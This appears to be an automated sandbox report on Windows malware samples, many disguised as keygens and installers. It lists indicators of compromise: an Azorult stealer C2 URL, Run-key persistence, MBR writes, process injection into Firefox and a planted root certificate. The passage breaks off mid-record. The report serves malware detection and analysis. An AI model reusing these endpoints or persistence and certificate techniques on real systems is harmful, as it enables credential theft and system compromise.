Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
4ฺฺฺK...ฺฺ
windows10_x64
7ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
3Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1801s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 14:18
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Nirsoft 8 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\1605712587875.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712587875.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712592235.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712592235.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712597672.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712597672.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712600360.exe Nirsoft C:\Users\Admin\AppData\Roaming\1605712600360.exe Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 27 IoCs
Processes:
intro.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exe002.exeSetup.exesetup.exealiens.exejg2_2qua.exeaskinstall21.exehjjgaa.exejfiag3g_gg.exe1A27AE19C9E414DC.exe1A27AE19C9E414DC.exejfiag3g_gg.exe1605712587875.exe1605712592235.exe1605712597672.exe1605712600360.exeThunderFW.exeMiniThunderPlatform.exe1021C014A4C9A552.exe1021C014A4C9A552.tmpseed.sfx.exepid process 3240 intro.exe 200 keygen-pr.exe 212 keygen-step-1.exe 1240 keygen-step-2.exe 3784 keygen-step-3.exe 820 keygen-step-4.exe 348 key.exe 1536 002.exe 3092 Setup.exe 1176 setup.exe 1120 aliens.exe 2104 jg2_2qua.exe 1032 askinstall21.exe 3356 hjjgaa.exe 3224 jfiag3g_gg.exe 2416 1A27AE19C9E414DC.exe 204 1A27AE19C9E414DC.exe 816 jfiag3g_gg.exe 1864 1605712587875.exe 2444 1605712592235.exe 616 1605712597672.exe 2524 1605712600360.exe 2608 ThunderFW.exe 3824 MiniThunderPlatform.exe 1444 1021C014A4C9A552.exe 2672 1021C014A4C9A552.tmp 2724 seed.sfx.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\gdiview.msi office_xlm_macros -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Loads dropped DLL 13 IoCs
Processes:
Setup.exeMsiExec.exe1A27AE19C9E414DC.exeMiniThunderPlatform.exepid process 3092 Setup.exe 3092 Setup.exe 3092 Setup.exe 3136 MsiExec.exe 2416 1A27AE19C9E414DC.exe 2416 1A27AE19C9E414DC.exe 3824 MiniThunderPlatform.exe 3824 MiniThunderPlatform.exe 3824 MiniThunderPlatform.exe 3824 MiniThunderPlatform.exe 3824 MiniThunderPlatform.exe 3824 MiniThunderPlatform.exe 3824 MiniThunderPlatform.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
hjjgaa.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg2_2qua.exealiens.exe1A27AE19C9E414DC.exe1A27AE19C9E414DC.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg2_2qua.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aliens.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1A27AE19C9E414DC.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 51 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
aliens.exe1A27AE19C9E414DC.exe1A27AE19C9E414DC.exeMiniThunderPlatform.exedescription ioc process File opened for modification \??\PhysicalDrive0 aliens.exe File opened for modification \??\PhysicalDrive0 1A27AE19C9E414DC.exe File opened for modification \??\PhysicalDrive0 1A27AE19C9E414DC.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
aliens.exepid process 1120 aliens.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
1A27AE19C9E414DC.exedescription pid process target process PID 2416 set thread context of 3244 2416 1A27AE19C9E414DC.exe firefox.exe PID 2416 set thread context of 648 2416 1A27AE19C9E414DC.exe firefox.exe PID 2416 set thread context of 2964 2416 1A27AE19C9E414DC.exe firefox.exe PID 2416 set thread context of 1048 2416 1A27AE19C9E414DC.exe firefox.exe -
Drops file in Program Files directory 33 IoCs
Processes:
1021C014A4C9A552.tmpsetup.exedescription ioc process File created C:\Program Files (x86)\RearRips\images\is-PNCJ2.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-0I7II.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\9ku5npt6tedk\aliens.exe setup.exe File opened for modification C:\Program Files (x86)\RearRips\seed.sfx.exe 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-DQLU1.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\9ku5npt6tedk\__tmp_rar_sfx_access_check_260994390 setup.exe File created C:\Program Files (x86)\RearRips\is-S7L97.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-9ELPT.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-S3V9D.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-9D8QM.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-BK8T4.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\RearRips\DreamTrip.exe 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\unins000.dat 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-E5BUH.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\lang\is-UMMJ9.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\RearRips\unins000.dat 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\9ku5npt6tedk\aliens.exe setup.exe File created C:\Program Files (x86)\RearRips\images\is-JOJTL.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-E8UIS.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-ECQ1L.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-TRG81.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-JDK6G.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-QTFT1.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-G9TO5.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-4HL8T.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-R0CID.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-5GE29.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-TM6C3.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-3H7F6.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-TQN4I.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\9ku5npt6tedk setup.exe File created C:\Program Files (x86)\RearRips\is-GMF4A.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\lang\is-CP2G9.tmp 1021C014A4C9A552.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1A27AE19C9E414DC.exe1A27AE19C9E414DC.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 1A27AE19C9E414DC.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 824 taskkill.exe 1404 taskkill.exe -
Processes:
aliens.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD aliens.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 aliens.exe -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 1264 PING.EXE 2380 PING.EXE 2108 PING.EXE 1600 PING.EXE 2800 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
jfiag3g_gg.exe1605712587875.exe1605712592235.exe1605712597672.exe1605712600360.exe1021C014A4C9A552.tmppid process 816 jfiag3g_gg.exe 816 jfiag3g_gg.exe 1864 1605712587875.exe 1864 1605712587875.exe 2444 1605712592235.exe 2444 1605712592235.exe 616 1605712597672.exe 616 1605712597672.exe 2524 1605712600360.exe 2524 1605712600360.exe 2672 1021C014A4C9A552.tmp 2672 1021C014A4C9A552.tmp -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
jg2_2qua.exemsiexec.exetaskkill.exemsiexec.exedescription pid process Token: SeManageVolumePrivilege 2104 jg2_2qua.exe Token: SeManageVolumePrivilege 2104 jg2_2qua.exe Token: SeShutdownPrivilege 2676 msiexec.exe Token: SeIncreaseQuotaPrivilege 2676 msiexec.exe Token: SeDebugPrivilege 824 taskkill.exe Token: SeSecurityPrivilege 3368 msiexec.exe Token: SeCreateTokenPrivilege 2676 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2676 msiexec.exe Token: SeLockMemoryPrivilege 2676 msiexec.exe Token: SeIncreaseQuotaPrivilege 2676 msiexec.exe Token: SeMachineAccountPrivilege 2676 msiexec.exe Token: SeTcbPrivilege 2676 msiexec.exe Token: SeSecurityPrivilege 2676 msiexec.exe Token: SeTakeOwnershipPrivilege 2676 msiexec.exe Token: SeLoadDriverPrivilege 2676 msiexec.exe Token: SeSystemProfilePrivilege 2676 msiexec.exe Token: SeSystemtimePrivilege 2676 msiexec.exe Token: SeProfSingleProcessPrivilege 2676 msiexec.exe Token: SeIncBasePriorityPrivilege 2676 msiexec.exe Token: SeCreatePagefilePrivilege 2676 msiexec.exe Token: SeCreatePermanentPrivilege 2676 msiexec.exe Token: SeBackupPrivilege 2676 msiexec.exe Token: SeRestorePrivilege 2676 msiexec.exe Token: SeShutdownPrivilege 2676 msiexec.exe Token: SeDebugPrivilege 2676 msiexec.exe Token: SeAuditPrivilege 2676 msiexec.exe Token: SeSystemEnvironmentPrivilege 2676 msiexec.exe Token: SeChangeNotifyPrivilege 2676 msiexec.exe Token: SeRemoteShutdownPrivilege 2676 msiexec.exe Token: SeUndockPrivilege 2676 msiexec.exe Token: SeSyncAgentPrivilege 2676 msiexec.exe Token: SeEnableDelegationPrivilege 2676 msiexec.exe Token: SeManageVolumePrivilege 2676 msiexec.exe Token: SeImpersonatePrivilege 2676 msiexec.exe Token: SeCreateGlobalPrivilege 2676 msiexec.exe Token: SeCreateTokenPrivilege 2676 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2676 msiexec.exe Token: SeLockMemoryPrivilege 2676 msiexec.exe Token: SeIncreaseQuotaPrivilege 2676 msiexec.exe Token: SeMachineAccountPrivilege 2676 msiexec.exe Token: SeTcbPrivilege 2676 msiexec.exe Token: SeSecurityPrivilege 2676 msiexec.exe Token: SeTakeOwnershipPrivilege 2676 msiexec.exe Token: SeLoadDriverPrivilege 2676 msiexec.exe Token: SeSystemProfilePrivilege 2676 msiexec.exe Token: SeSystemtimePrivilege 2676 msiexec.exe Token: SeProfSingleProcessPrivilege 2676 msiexec.exe Token: SeIncBasePriorityPrivilege 2676 msiexec.exe Token: SeCreatePagefilePrivilege 2676 msiexec.exe Token: SeCreatePermanentPrivilege 2676 msiexec.exe Token: SeBackupPrivilege 2676 msiexec.exe Token: SeRestorePrivilege 2676 msiexec.exe Token: SeShutdownPrivilege 2676 msiexec.exe Token: SeDebugPrivilege 2676 msiexec.exe Token: SeAuditPrivilege 2676 msiexec.exe Token: SeSystemEnvironmentPrivilege 2676 msiexec.exe Token: SeChangeNotifyPrivilege 2676 msiexec.exe Token: SeRemoteShutdownPrivilege 2676 msiexec.exe Token: SeUndockPrivilege 2676 msiexec.exe Token: SeSyncAgentPrivilege 2676 msiexec.exe Token: SeEnableDelegationPrivilege 2676 msiexec.exe Token: SeManageVolumePrivilege 2676 msiexec.exe Token: SeImpersonatePrivilege 2676 msiexec.exe Token: SeCreateGlobalPrivilege 2676 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msiexec.exe1021C014A4C9A552.tmppid process 2676 msiexec.exe 2672 1021C014A4C9A552.tmp -
Suspicious use of SetWindowsHookEx 21 IoCs
Processes:
keygen-step-2.exe002.exeSetup.exesetup.exealiens.exe1A27AE19C9E414DC.exe1A27AE19C9E414DC.exefirefox.exe1605712587875.exefirefox.exe1605712592235.exefirefox.exe1605712597672.exefirefox.exe1605712600360.exeThunderFW.exeMiniThunderPlatform.exe1021C014A4C9A552.exe1021C014A4C9A552.tmpseed.sfx.exepid process 1240 keygen-step-2.exe 1536 002.exe 1536 002.exe 3092 Setup.exe 1176 setup.exe 1120 aliens.exe 2416 1A27AE19C9E414DC.exe 204 1A27AE19C9E414DC.exe 3244 firefox.exe 1864 1605712587875.exe 648 firefox.exe 2444 1605712592235.exe 2964 firefox.exe 616 1605712597672.exe 1048 firefox.exe 2524 1605712600360.exe 2608 ThunderFW.exe 3824 MiniThunderPlatform.exe 1444 1021C014A4C9A552.exe 2672 1021C014A4C9A552.tmp 2724 seed.sfx.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3DMark 11 Advanced Edition.bin.execmd.exekeygen-step-3.exekeygen-pr.execmd.exekeygen-step-4.exekey.exekeygen-step-2.execmd.exeSetup.exesetup.exealiens.exeaskinstall21.execmd.exedescription pid process target process PID 848 wrote to memory of 3608 848 3DMark 11 Advanced Edition.bin.exe cmd.exe PID 848 wrote to memory of 3608 848 3DMark 11 Advanced Edition.bin.exe cmd.exe PID 848 wrote to memory of 3608 848 3DMark 11 Advanced Edition.bin.exe cmd.exe PID 3608 wrote to memory of 3240 3608 cmd.exe intro.exe PID 3608 wrote to memory of 3240 3608 cmd.exe intro.exe PID 3608 wrote to memory of 3240 3608 cmd.exe intro.exe PID 3608 wrote to memory of 200 3608 cmd.exe keygen-pr.exe PID 3608 wrote to memory of 200 3608 cmd.exe keygen-pr.exe PID 3608 wrote to memory of 200 3608 cmd.exe keygen-pr.exe PID 3608 wrote to memory of 212 3608 cmd.exe keygen-step-1.exe PID 3608 wrote to memory of 212 3608 cmd.exe keygen-step-1.exe PID 3608 wrote to memory of 212 3608 cmd.exe keygen-step-1.exe PID 3608 wrote to memory of 1240 3608 cmd.exe keygen-step-2.exe PID 3608 wrote to memory of 1240 3608 cmd.exe keygen-step-2.exe PID 3608 wrote to memory of 1240 3608 cmd.exe keygen-step-2.exe PID 3608 wrote to memory of 3784 3608 cmd.exe keygen-step-3.exe PID 3608 wrote to memory of 3784 3608 cmd.exe keygen-step-3.exe PID 3608 wrote to memory of 3784 3608 cmd.exe keygen-step-3.exe PID 3784 wrote to memory of 4088 3784 keygen-step-3.exe cmd.exe PID 3784 wrote to memory of 4088 3784 keygen-step-3.exe cmd.exe PID 3784 wrote to memory of 4088 3784 keygen-step-3.exe cmd.exe PID 3608 wrote to memory of 820 3608 cmd.exe keygen-step-4.exe PID 3608 wrote to memory of 820 3608 cmd.exe keygen-step-4.exe PID 3608 wrote to memory of 820 3608 cmd.exe keygen-step-4.exe PID 200 wrote to memory of 348 200 keygen-pr.exe key.exe PID 200 wrote to memory of 348 200 keygen-pr.exe key.exe PID 200 wrote to memory of 348 200 keygen-pr.exe key.exe PID 4088 wrote to memory of 2800 4088 cmd.exe PING.EXE PID 4088 wrote to memory of 2800 4088 cmd.exe PING.EXE PID 4088 wrote to memory of 2800 4088 cmd.exe PING.EXE PID 820 wrote to memory of 1536 820 keygen-step-4.exe 002.exe PID 820 wrote to memory of 1536 820 keygen-step-4.exe 002.exe PID 820 wrote to memory of 1536 820 keygen-step-4.exe 002.exe PID 348 wrote to memory of 2340 348 key.exe key.exe PID 348 wrote to memory of 2340 348 key.exe key.exe PID 348 wrote to memory of 2340 348 key.exe key.exe PID 1240 wrote to memory of 3612 1240 keygen-step-2.exe cmd.exe PID 1240 wrote to memory of 3612 1240 keygen-step-2.exe cmd.exe PID 1240 wrote to memory of 3612 1240 keygen-step-2.exe cmd.exe PID 3612 wrote to memory of 1264 3612 cmd.exe PING.EXE PID 3612 wrote to memory of 1264 3612 cmd.exe PING.EXE PID 3612 wrote to memory of 1264 3612 cmd.exe PING.EXE PID 820 wrote to memory of 3092 820 keygen-step-4.exe Setup.exe PID 820 wrote to memory of 3092 820 keygen-step-4.exe Setup.exe PID 820 wrote to memory of 3092 820 keygen-step-4.exe Setup.exe PID 3092 wrote to memory of 1176 3092 Setup.exe setup.exe PID 3092 wrote to memory of 1176 3092 Setup.exe setup.exe PID 3092 wrote to memory of 1176 3092 Setup.exe setup.exe PID 1176 wrote to memory of 1120 1176 setup.exe aliens.exe PID 1176 wrote to memory of 1120 1176 setup.exe aliens.exe PID 1176 wrote to memory of 1120 1176 setup.exe aliens.exe PID 820 wrote to memory of 2104 820 keygen-step-4.exe jg2_2qua.exe PID 820 wrote to memory of 2104 820 keygen-step-4.exe jg2_2qua.exe PID 820 wrote to memory of 2104 820 keygen-step-4.exe jg2_2qua.exe PID 820 wrote to memory of 1032 820 keygen-step-4.exe askinstall21.exe PID 820 